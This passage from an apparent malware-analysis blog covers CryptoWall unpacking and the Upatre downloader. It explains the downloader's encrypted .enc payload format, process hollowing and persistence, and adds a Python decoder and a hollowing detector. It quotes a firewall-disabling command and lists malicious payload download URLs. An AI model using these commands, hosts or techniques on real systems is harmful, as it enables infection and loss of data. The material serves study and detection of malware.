<br /></div>
<div>
It will then verify whether it is running with administrative privileges and, when successful, create a mutex named <i style="font-weight: bold;">"UACMut"</i>. (<i style="color: blue;">Push 4 - Call CRYPTO_UNPACK2)</i></div>
<div>
<br /></div>
<div>
Next, it creates a copy of itself at %ALLUSERSPROFILE%\Start Menu\Programs\Startup\system.pif and in %USERPROFILE%\Application Data with hidden and system attributes. It also creates REGRUN entries pointing to its copy to ensure automatic execution at Windows startup.<br />
<br />
The firewall service may also be disabled using the command line "net stop Mpssvc". (<i style="color: blue;">Push 8 - Call CRYPTO_UNPACK2)</i><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAHQAlhdSZKB9X0-UXrIk-Sr6tnUmxYfcm4LlgyM-P7d7Iv5qYuLCgsFVjknWkHUruqo3k6Pm9PZuqk1v8wpMDl1B33b-f8lu6odxrstoeJJ7RH6FpF1zuRYJ7nvRITYYckd80D-z7/s1600/firewalldisable.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAHQAlhdSZKB9X0-UXrIk-Sr6tnUmxYfcm4LlgyM-P7d7Iv5qYuLCgsFVjknWkHUruqo3k6Pm9PZuqk1v8wpMDl1B33b-f8lu6odxrstoeJJ7RH6FpF1zuRYJ7nvRITYYckd80D-z7/s1600/firewalldisable.png" height="140" width="320" /></a></div>
<br />
The newly unpacked MZ-PE file (unpacked CryptoWall) is then executed in memory by spawning a suspended process of itself and replacing all of its contents with those of the newly unpacked CryptoWall using the WriteProcessMemory API, before finally calling ResumeThread. (<i style="color: blue;">Push 7 - Call CRYPTO_UNPACK2)</i><br />
<br />
This is where unpacking ends and the real cryptowall malware starts. You can continue analysis of the unpacked cryptowall malware if you want, but my job here is done :)<br />
<br />
<br />
<div style="text-align: right;">
Christopher D. Del Fierro</div>
</div>
<h4>
Upatre: .ENC File Extension (2014-10-23)</h4>
<div class="MsoNormal">
Cybercriminals use different techniques to get past the network intrusion defenses users rely on to keep malware out of their systems. This time the criminals have found a new way to deceive users and steal important information: the payload is encrypted and made non-executable, with a file extension of either “.ENC” or “.EXE”. These files are known to be downloaded by Upatre malware.</div>
<br />
<div class="MsoNormal">
Upatre samples are only 5KB-10KB in size. This is noticeably small compared to other malware, since its only role is to download the “.enc” or “.exe” file, decompress it and execute it. To evade detection, the downloaded file's magic bytes are ZZP, and without the downloader the downloaded files are completely unexecutable.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxluV73GqRA9B_BWmJZPvpmVaWA509ZM1CSeSzc3SqJfi7sTg1lUBwuUK2J_6Ste6XzHu0fsKVlnysOzdNPXMs749hDyN_-rqayqhvKd49HdEYMEur9ie6VB6l1qSY7YKtDRHJ1koaHc/s1600/Upatre_image1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxluV73GqRA9B_BWmJZPvpmVaWA509ZM1CSeSzc3SqJfi7sTg1lUBwuUK2J_6Ste6XzHu0fsKVlnysOzdNPXMs749hDyN_-rqayqhvKd49HdEYMEur9ie6VB6l1qSY7YKtDRHJ1koaHc/s1600/Upatre_image1.jpeg" height="400" width="357" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div align="center" class="MsoNormal" style="text-align: center;">
Sample of downloaded file</div>
<div align="center" class="MsoNormal" style="text-align: center;">
<br /></div>
<div class="MsoNormal">
The Downloader</div>
<div class="MsoNormal">
<i><span style="font-size: 9.0pt; line-height: 115%;">cef76fa7b4b30f76c7b6d2eefa30d944<o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-size: 9.0pt; line-height: 115%;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: center;">
</div>
<div class="MsoNormal">
It will first check whether the malware is running under its desired filename from the %TEMP% folder. If not, it will create a copy of itself with its desired filename and execute it using ShellExecuteW.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_zHPHAYgaCx_vd9m5Jb7l9IhYRCrVVJ5CmckVsv880gBl2OiCnbJwkA74I6Ui9DUCzFsuPGhjQ0tBBeK4lQpZKJ_Z2R-xrrPt5orwQN0EFoXqBgDH-Dr2otNu7oOzbtEdDBNFZBA4v0/s1600/Upatre_image2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_zHPHAYgaCx_vd9m5Jb7l9IhYRCrVVJ5CmckVsv880gBl2OiCnbJwkA74I6Ui9DUCzFsuPGhjQ0tBBeK4lQpZKJ_Z2R-xrrPt5orwQN0EFoXqBgDH-Dr2otNu7oOzbtEdDBNFZBA4v0/s1600/Upatre_image2.jpeg" height="41" width="640" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Check if the existing filename is budha.exe</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8OXC6_sfD1PwPOy7IaBidLN6LiwJ5u94Ur-u1UWmdE7Hfk_kcOetN0DYJdNXrHAohfvUufRHTfuWEm2kF_RqU1XFHN1RUj1UR4ZRTgla5CZMMc5QKq2LrsoGsdrYPzmVdFRX-RP5gu0/s1600/Upatre_image3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8OXC6_sfD1PwPOy7IaBidLN6LiwJ5u94Ur-u1UWmdE7Hfk_kcOetN0DYJdNXrHAohfvUufRHTfuWEm2kF_RqU1XFHN1RUj1UR4ZRTgla5CZMMc5QKq2LrsoGsdrYPzmVdFRX-RP5gu0/s1600/Upatre_image3.jpeg" height="176" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Create and Execute budha.exe</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
It will connect to the following sites to download the second piece of malware, the encrypted one (“.enc” or “.exe” files).</div>
<div class="MsoNormal" style="margin-left: .25in;">
</div>
<ul>
<li>dcmsservices.com/images/stories/slides/pdf.enc</li>
<li>electriciansdublinireland.com/wp-content/uploads/2014/01/pdf.enc</li>
<li>freebiegalore.com/facelift/pdf.exe</li>
<li>freebiesvaults.info/freebies/nucleus/images/pdf.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OAobBalUBrgceNIf8ObT6xHHT9PQSw1OZjUo29eZpxcexLQE0J_8guA3OjdaEO5w-YxBiA7Ldfp34ZnWRhXDuBK00G0E_CjKwvOHddEdnHEFr99Q5d9lkzKp5vb4Us_xVqLSz1GUu4I/s1600/Upatre_image4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OAobBalUBrgceNIf8ObT6xHHT9PQSw1OZjUo29eZpxcexLQE0J_8guA3OjdaEO5w-YxBiA7Ldfp34ZnWRhXDuBK00G0E_CjKwvOHddEdnHEFr99Q5d9lkzKp5vb4Us_xVqLSz1GUu4I/s1600/Upatre_image4.jpeg" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
The downloader is also responsible for decrypting and decompressing the downloaded file. In the memory dump above, the four bytes at offset 60 are the XOR decryption key. Before decrypting the downloaded file it first checks whether the file's magic bytes are ZZP\0. Decrypted files are in compressed form and must be decompressed using RtlDecompressBuffer.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtrNXqnPMnvDXhCbvngBhKH69jMgxKd-w21UhCpyMv0LIY6dtw1MEQZIy5dGelguE36iod2BtuWh6AfgXLFiaF1UdYYnP5-2KxraFp7vmY37skgk89v8TzhC7H_pyJGeOcaZmWX-fYfc/s1600/Upatre_image5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtrNXqnPMnvDXhCbvngBhKH69jMgxKd-w21UhCpyMv0LIY6dtw1MEQZIy5dGelguE36iod2BtuWh6AfgXLFiaF1UdYYnP5-2KxraFp7vmY37skgk89v8TzhC7H_pyJGeOcaZmWX-fYfc/s1600/Upatre_image5.jpeg" height="104" width="640" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Magic Bytes checking</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyV0smbfg1CTDF0xuA-2WPWDZExQn0Q8CzGRDjxAQBQpRdA5Zs9ojZsOSnkZ5bwIeQYo5aPeXL69HN3Hfjhi0kLxac-MVYxb-m_1G3j5JcJqxeNudCZ1lxVxGmMjV6WIqkhn-CSqCjVug/s1600/Upatre_image6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyV0smbfg1CTDF0xuA-2WPWDZExQn0Q8CzGRDjxAQBQpRdA5Zs9ojZsOSnkZ5bwIeQYo5aPeXL69HN3Hfjhi0kLxac-MVYxb-m_1G3j5JcJqxeNudCZ1lxVxGmMjV6WIqkhn-CSqCjVug/s1600/Upatre_image6.jpeg" height="171" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Decryption and Decompression routine</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi8_9FRF92PM6UWfVxB-iYsYq9Z7xIj8FFKy7Yaonm9E9J4VqJkW0vhNgUFwOK6hkpKPyElInZVXzDrhUxozkJXCR4_scIoRWcxF1xGJ-GFJj-hKds7KYJq0N1MlskBwWaPo3_ZeTBPzs/s1600/Upatre_image7.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi8_9FRF92PM6UWfVxB-iYsYq9Z7xIj8FFKy7Yaonm9E9J4VqJkW0vhNgUFwOK6hkpKPyElInZVXzDrhUxozkJXCR4_scIoRWcxF1xGJ-GFJj-hKds7KYJq0N1MlskBwWaPo3_ZeTBPzs/s1600/Upatre_image7.jpeg" height="400" width="362" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Copy of decrypted file</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
<i><span style="font-size: 10.0pt; line-height: 115%;">Note: ZZP/0 is not included in bytes
to be decrypt. <o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-size: 10.0pt; line-height: 115%;"><br /></span></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
</div>
<div class="MsoNormal">
If the above check fails, it skips the decryption step and proceeds to check the MZ header. It then creates a copy of the decompressed file, or of the downloaded file if it is already a valid Win32 PE, in the %TEMP% folder and executes it.</div>
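<div class="MsoNormal">
The decode sequence described above, as an added example that is not part of the original post: a Python helper that checks for the ZZP\0 magic, XORs the remaining bytes with the four-byte key (read from the location the post identifies and passed in; the repeating-key layout is an assumption), hands the result to a decompressor, and otherwise uses the blob as-is, accepting only a result that carries an MZ header. <i>rtl_decompress</i> calls ntdll's RtlDecompressBuffer as the downloader does and only works on Windows, with LZNT1 assumed as the format; the constructed sample at the bottom uses an identity stand-in so the logic can be exercised anywhere.</div>

```python
import ctypes
import sys
from typing import Callable, Optional

ZZP_MAGIC = b"ZZP\x00"
COMPRESSION_FORMAT_LZNT1 = 2  # ntdll constant; the post does not name the format


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """XOR the payload with the 4-byte key, repeating the key (assumed layout:
    the post names a four-byte XOR key but does not show the loop itself)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rtl_decompress(compressed: bytes, max_size: int = 16 * 1024 * 1024) -> bytes:
    """Windows-only: call ntdll!RtlDecompressBuffer like the downloader does."""
    if not sys.platform.startswith("win"):
        raise OSError("RtlDecompressBuffer is only available on Windows")
    ntdll = ctypes.WinDLL("ntdll")
    out = ctypes.create_string_buffer(max_size)
    final_size = ctypes.c_ulong(0)
    status = ntdll.RtlDecompressBuffer(
        ctypes.c_ushort(COMPRESSION_FORMAT_LZNT1),
        out, ctypes.c_ulong(max_size),
        compressed, ctypes.c_ulong(len(compressed)),
        ctypes.byref(final_size),
    )
    if status != 0:
        raise ValueError("RtlDecompressBuffer failed: NTSTATUS 0x%08X" % (status & 0xFFFFFFFF))
    return out.raw[: final_size.value]


def unwrap_enc(blob: bytes, key: bytes,
               decompress: Callable[[bytes], bytes] = rtl_decompress) -> Optional[bytes]:
    """Turn a downloaded .enc/.exe blob into the PE the downloader would run.

    Mirrors the decision sequence described in the post:
      1. if the blob starts with ZZP\\0, XOR-decrypt everything after the magic
         (the magic itself is not part of the ciphertext) and decompress it;
      2. otherwise skip decryption and take the blob as it is;
      3. in both cases accept the result only if it carries an MZ header.
    Returns the PE image, or None when the result is not a PE.
    """
    if blob.startswith(ZZP_MAGIC):
        decrypted = xor_decrypt(blob[len(ZZP_MAGIC):], key)
        candidate = decompress(decrypted)
    else:
        candidate = blob
    if candidate[:2] != b"MZ":
        return None
    return candidate


# Constructed sample data (not from a real sample): a stub with an MZ header,
# wrapped the way the downloader expects, using an identity stand-in for the
# decompressor so the example runs on any platform.
SAMPLE_KEY = b"\x13\x37\xbe\xef"
SAMPLE_PE = b"MZ" + b"\x90" * 14 + b"PE\x00\x00" + b"\x00" * 8


def build_enc(payload: bytes, key: bytes) -> bytes:
    """Wrap an (already compressed) payload as a ZZP blob; XOR is symmetric."""
    return ZZP_MAGIC + xor_decrypt(payload, key)


if __name__ == "__main__":
    blob = build_enc(SAMPLE_PE, SAMPLE_KEY)
    print(unwrap_enc(blob, SAMPLE_KEY, decompress=lambda d: d) == SAMPLE_PE)
```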
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9nf-v6yDOucPeqDBlf4lcNbPizPWBez0IwRGmILVFjSAIVmoZDdw4YQhpz1su8yhIJrVrgHeEXm0vnKbm9kLAgdOhnGMRKu-ZgAshCdE11026CRSuDWi9jNsFTzDWuVmtjWMo-CE-2W8/s1600/Upatre_image8.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9nf-v6yDOucPeqDBlf4lcNbPizPWBez0IwRGmILVFjSAIVmoZDdw4YQhpz1su8yhIJrVrgHeEXm0vnKbm9kLAgdOhnGMRKu-ZgAshCdE11026CRSuDWi9jNsFTzDWuVmtjWMo-CE-2W8/s1600/Upatre_image8.jpeg" height="140" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>MZ header checking and creating a copy of downloaded file</i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
The Downloaded File</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
The downloaded file contains an encrypted file in its resource section.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPnDa0hTOjblLHaey5IFQmFqEetVd171KvEywpGWMJ17nzgWnQpsopDog3boRghp8UZCVk5MXXu79BWAQLsHFjmmmpcHm023dvMaNSLdowHWNLdBR71Tf0nBD85F8INJrbaW5vyR0aMq0/s1600/Upatre_image9.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPnDa0hTOjblLHaey5IFQmFqEetVd171KvEywpGWMJ17nzgWnQpsopDog3boRghp8UZCVk5MXXu79BWAQLsHFjmmmpcHm023dvMaNSLdowHWNLdBR71Tf0nBD85F8INJrbaW5vyR0aMq0/s1600/Upatre_image9.jpeg" height="341" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
Encrypted resource<br />
<br />
<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXS-SoLdloVysD-Sw1e146vevXlUafuFJIMFUl4cqHimUjY1N-Xl_DjitSIFWO5dYXGFGWm9WJBlME6Z5u5GLTrBGOH_5ZUGAWxFL1E1AGxXlxpHJz8wtefDSihSiPMPywHtj-cgacIOQ/s1600/Upatre_image10.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXS-SoLdloVysD-Sw1e146vevXlUafuFJIMFUl4cqHimUjY1N-Xl_DjitSIFWO5dYXGFGWm9WJBlME6Z5u5GLTrBGOH_5ZUGAWxFL1E1AGxXlxpHJz8wtefDSihSiPMPywHtj-cgacIOQ/s1600/Upatre_image10.jpeg" height="376" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Decrypted
resource</span></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal">
It reads the resource section through the FindResource,
LoadResource and LockResource APIs rather than LoadBitmap, so that it can copy
the raw resource data into another process.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3SOqmj60PyE5eDaBfOAYc1GnTeC0FNoDLyQ8B44GisMHWXYLlr59vgyvUs0hEFRw2Hwjwkh_Yh97d_I7Qm-ZTEpYmdxj1pvt6RL3xEEWHnU_hMHMH4AbJx4wGJzMw6arT_RM-oveOGD8/s1600/Upatre_image11.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3SOqmj60PyE5eDaBfOAYc1GnTeC0FNoDLyQ8B44GisMHWXYLlr59vgyvUs0hEFRw2Hwjwkh_Yh97d_I7Qm-ZTEpYmdxj1pvt6RL3xEEWHnU_hMHMH4AbJx4wGJzMw6arT_RM-oveOGD8/s1600/Upatre_image11.jpeg" height="167" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
This malware is simply a loader for the encrypted Win32
file in its resource section. It uses the process hollowing technique to run that
file, but instead of hollowing a legitimate process it creates a second instance of
the downloaded file itself in a suspended state.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVI7hCgVo69oGbpQIF18dR_XSAQcj69ONoBg11JI4hqg146SLUQGb4d5kmR9oHE2rlD4CyJGZ2TJJuBRmAbcDO3vSiCBFHXuBFmZsApWggLEGrFuzA0DvdfO4ZaHlexPmaqOMdUk7pkYk/s1600/Upatre_image12.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVI7hCgVo69oGbpQIF18dR_XSAQcj69ONoBg11JI4hqg146SLUQGb4d5kmR9oHE2rlD4CyJGZ2TJJuBRmAbcDO3vSiCBFHXuBFmZsApWggLEGrFuzA0DvdfO4ZaHlexPmaqOMdUk7pkYk/s1600/Upatre_image12.jpeg" height="58" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0NR5YxVph3AODkLMh7WgY_3S61FuRGmpBjPFasu1U-pFTTMq3nhWIxbW8Rc4EtEaKVcZkKoNwp-DjJZ7E2fZW3Lzjzop3jDk-MkM8D3DzZfIQGKBolPCf62bwXX9IwV_VKgrkcBOe6I/s1600/Upatre_image13.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0NR5YxVph3AODkLMh7WgY_3S61FuRGmpBjPFasu1U-pFTTMq3nhWIxbW8Rc4EtEaKVcZkKoNwp-DjJZ7E2fZW3Lzjzop3jDk-MkM8D3DzZfIQGKBolPCf62bwXX9IwV_VKgrkcBOe6I/s1600/Upatre_image13.jpeg" height="152" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
Then the malware unmaps the original code from memory in
the host process using the <span style="background: white; mso-bidi-font-family: "Courier New";">ZwUnmapViewOfSection API</span>, and uses VirtualAllocEx to
allocate memory for the new code.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiviOBoa0ZHLoJkv4UIGGxsvf0k3l-35hweSzSyQ-PL89cBbzuKb9tSW7Eg5zZzWERk8qM1rmoKOGJ9s0mXQaaGLXWghs3PZ581kMpAwZyRwle9PJCRYgdlPBTqcGHkZCi4FeAnMDSipqk/s1600/Upatre_image14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiviOBoa0ZHLoJkv4UIGGxsvf0k3l-35hweSzSyQ-PL89cBbzuKb9tSW7Eg5zZzWERk8qM1rmoKOGJ9s0mXQaaGLXWghs3PZ581kMpAwZyRwle9PJCRYgdlPBTqcGHkZCi4FeAnMDSipqk/s1600/Upatre_image14.jpeg" height="185" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The malware writes its new code into the hollowed host
process using WriteProcessMemory. The data written into the hollowed host
process comes from the resource section of the downloaded file (0x40555A). Then the
malware simply resumes the suspended process using ResumeThread.<o:p></o:p></div>
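The five-call sequence just described (suspended child, unmap, allocate, write, resume) is what a defender looks for in an API trace. The detector below is an added example, not code from the post; the tab-separated trace format and the sample lines are constructed for it.

```python
"""Flag the process-hollowing API sequence described above in an API-call trace.

Added example, not from the original post. The trace format (one call per line,
"pid<TAB>api<TAB>args") is constructed for this example, not any sandbox's real output.
"""
import re
from collections import defaultdict

# The sequence the post describes: create the child suspended, unmap its
# image, allocate new memory, write the payload in, resume the main thread.
HOLLOWING_SEQUENCE = [
    "CreateProcessW",        # must carry CREATE_SUSPENDED in dwCreationFlags
    "ZwUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "ResumeThread",
]
CREATE_SUSPENDED = 0x4


def parse_trace(text):
    """Yield (pid, api, args) tuples from the constructed trace format."""
    for line in text.strip().splitlines():
        pid, api, args = line.split("\t", 2)
        yield int(pid), api, args


def creation_flags(args):
    """Extract dwCreationFlags=0x... from a CreateProcessW argument string."""
    m = re.search(r"dwCreationFlags=(0x[0-9a-fA-F]+)", args)
    return int(m.group(1), 16) if m else 0


def find_hollowing(trace_text):
    """Return the PIDs whose calls contain the full sequence, in order.

    A CreateProcessW call only counts as step 1 when CREATE_SUSPENDED is set;
    the remaining steps must follow in order, but unrelated calls may interleave.
    """
    progress = defaultdict(int)   # pid -> index of the next expected API
    hits = []
    for pid, api, args in parse_trace(trace_text):
        expected = HOLLOWING_SEQUENCE[progress[pid]]
        if api != expected:
            continue
        if api == "CreateProcessW" and not creation_flags(args) & CREATE_SUSPENDED:
            continue
        progress[pid] += 1
        if progress[pid] == len(HOLLOWING_SEQUENCE):
            hits.append(pid)
            progress[pid] = 0
    return hits


# Constructed trace: PID 1000 performs the hollowing sequence on a second copy
# of the downloaded file (payload source 0x40555A as in the post); PID 2000
# starts a normal, non-suspended process and must not be flagged.
SAMPLE_TRACE = """\
1000\tCreateProcessW\tlpApplicationName=C:\\Users\\u\\AppData\\Local\\Temp\\dl.exe dwCreationFlags=0x4
1000\tZwUnmapViewOfSection\tProcessHandle=0x1a4 BaseAddress=0x400000
1000\tVirtualAllocEx\thProcess=0x1a4 lpAddress=0x400000 dwSize=0x1c000 flProtect=0x40
1000\tWriteProcessMemory\thProcess=0x1a4 lpBaseAddress=0x400000 lpBuffer=0x40555a
1000\tResumeThread\thThread=0x1a8
2000\tCreateProcessW\tlpApplicationName=C:\\Windows\\notepad.exe dwCreationFlags=0x0
2000\tWriteProcessMemory\thProcess=0x1b0 lpBaseAddress=0x500000
2000\tResumeThread\thThread=0x1b4
"""

if __name__ == "__main__":
    print("hollowing PIDs:", find_hollowing(SAMPLE_TRACE))   # [1000]
```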
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8RrHXy4qpLtoyphrrk4PYUxl8ao8SBUN3XSZACK850gmWJ5yrguWeusnuCEqqa3gtIdcFkpx8g1a3A_tHrRb0xB2MKEv-RBK3qNFnKLP37Vv1ZtDC3EAbpPvaftUJfBxOeYDrhaBDNqE/s1600/Upatre_image15.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8RrHXy4qpLtoyphrrk4PYUxl8ao8SBUN3XSZACK850gmWJ5yrguWeusnuCEqqa3gtIdcFkpx8g1a3A_tHrRb0xB2MKEv-RBK3qNFnKLP37Vv1ZtDC3EAbpPvaftUJfBxOeYDrhaBDNqE/s1600/Upatre_image15.jpeg" height="142" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjE2KPxR5xwPRCUOgpxde_I8Ya8sxZ6NX9lgNGY7g3RBHa2DBmvJsDUdr-NrlLj4C7vrxpcXYj0OhGaD8lhY3oEhlVOnMY0BJXfLqMUVq7mD84QXgHaua1_sOYTq5uCAArmCHDVIZ8cM/s1600/Upatre_image14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjE2KPxR5xwPRCUOgpxde_I8Ya8sxZ6NX9lgNGY7g3RBHa2DBmvJsDUdr-NrlLj4C7vrxpcXYj0OhGaD8lhY3oEhlVOnMY0BJXfLqMUVq7mD84QXgHaua1_sOYTq5uCAArmCHDVIZ8cM/s1600/Upatre_image14.jpeg" height="185" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<div class="MsoNormal">
The hollowed process contains an encrypted chunk of code that is
responsible for calling the functions that create a copy of the
malware.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
</div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt-sJJliGyEd7VNxPf6CgMIjJewRJF8XahVPOcghSRy52fmoJMLe9chT15IkH59yuo2pcMyY-FuGcxi_prxN034W3W2MxeJqHwA5XD7i8U4SY6iYQ0amqPs9IDv6huxHqtHeo_oqAj2HA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt-sJJliGyEd7VNxPf6CgMIjJewRJF8XahVPOcghSRy52fmoJMLe9chT15IkH59yuo2pcMyY-FuGcxi_prxN034W3W2MxeJqHwA5XD7i8U4SY6iYQ0amqPs9IDv6huxHqtHeo_oqAj2HA/s1600/1.png" height="125" width="400" /></a></div>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
It creates a folder in %APPDATA% with a random name whose first
character is always a capital letter. This folder holds a copy of the
malware, also under a random filename.<o:p></o:p></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
